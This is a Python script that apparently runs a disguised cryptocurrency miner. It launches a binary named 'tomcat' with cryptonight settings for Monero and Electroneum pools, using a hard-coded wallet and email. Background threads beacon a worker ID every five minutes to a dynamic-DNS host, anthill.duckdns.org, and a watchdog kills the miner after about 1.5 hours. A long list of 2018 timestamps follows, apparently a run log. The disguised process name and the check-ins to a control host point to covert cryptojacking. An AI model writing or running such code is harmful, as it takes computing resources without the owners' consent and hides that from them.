import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:43:07.190359
#2018-02-17 17:32:06.342080
#2018-02-17 19:20:01.328240
#2018-02-17 21:11:05.376549
#2018-02-17 22:55:02.096605
#2018-02-18 00:39:07.572455
#2018-02-18 02:30:07.064739
#2018-02-18 04:17:02.225069
#2018-02-18 06:07:04.623155
#2018-02-18 07:56:05.702673
#2018-02-18 09:44:06.894406
#2018-02-18 11:29:03.547513
#2018-02-18 13:15:09.453031
#2018-02-18 15:06:05.372103
#2018-02-18 16:53:04.196429
#2018-02-18 18:42:06.614247
#2018-02-18 20:29:03.476317
#2018-02-18 22:15:05.241127
#2018-02-19 00:04:07.100689
#2018-02-19 01:49:01.810328
#2018-02-19 03:36:07.517198
#2018-02-19 05:21:05.402099
#2018-02-19 07:08:01.473458
#2018-02-19 08:57:05.762543
#2018-02-19 10:45:07.782936
#2018-02-19 12:32:01.639804
#2018-02-19 14:19:03.971837
#2018-02-19 16:07:01.998994
#2018-02-19 17:56:04.797151
#2018-02-19 19:42:04.270253
#2018-02-19 21:29:05.406169
#2018-02-19 23:15:07.142732
#2018-02-20 01:02:06.297478
#2018-02-20 02:52:05.767480
#2018-02-20 04:41:04.080705
#2018-02-20 06:25:09.514474
#2018-02-20 08:10:04.498717
#2018-02-20 09:55:04.003152
#2018-02-20 11:40:06.212474
#2018-02-20 13:27:08.649532
#2018-02-20 15:13:07.433534
#2018-02-20 16:57:08.731464
#2018-02-20 18:46:08.071537
#2018-02-20 20:37:05.612180
#2018-02-20 22:21:07.590300
#2018-02-21 00:04:01.988881
#2018-02-21 01:49:03.850559
#2018-02-21 03:37:07.366217
#2018-02-21 05:26:05.112963
#2018-02-21 07:13:07.651413
#2018-02-21 08:59:02.045746
#2018-02-21 10:47:08.865362
#2018-02-21 12:33:04.508334
#2018-02-21 14:19:03.824234
#2018-02-21 16:07:08.830518
#2018-02-21 17:57:07.022450
#2018-02-21 19:44:09.088552
#2018-02-21 21:32:06.150693
#2018-02-21 23:22:04.298847
#2018-02-22 01:10:08.402472
#2018-02-22 02:57:07.883332
#2018-02-22 04:44:01.965167
#2018-02-22 06:28:07.188216
#2018-02-22 08:15:09.387976
#2018-02-22 10:04:07.310226
#2018-02-22 11:48:11.892519
#2018-02-22 13:34:08.004974
#2018-02-22 15:22:04.200015
#2018-02-22 17:09:04.997408
#2018-02-22 18:55:10.143047
#2018-02-22 20:47:07.596634
#2018-02-22 22:33:05.555355
#2018-02-23 00:21:01.717821
#2018-02-23 02:09:06.331347
#2018-02-23 03:53:08.539636
#2018-02-23 05:36:02.099381
#2018-02-23 07:21:05.895348
#2018-02-23 09:26:01.708871
#2018-02-23 11:31:06.199120
#2018-02-23 13:22:01.734526
#2018-02-23 15:07:07.099791
#2018-02-23 16:57:05.895317
#2018-02-23 18:59:07.822012
#2018-02-23 20:45:10.025088
#2018-02-23 22:35:08.670258
#2018-02-24 00:21:06.357270
#2018-02-24 02:13:04.356992
#2018-02-24 04:02:05.412645
#2018-02-24 06:42:07.635058
#2018-02-24 08:31:07.075157
#2018-02-24 10:18:07.129488
#2018-02-24 12:13:05.153566
#2018-02-24 13:59:06.308477
#2018-02-24 15:51:01.930777
#2018-02-24 17:43:04.352343
#2018-02-24 19:28:03.981192
#2018-02-24 21:18:05.499760
#2018-02-24 23:56:04.362481
#2018-02-25 03:12:02.147426
#2018-02-25 06:59:05.635060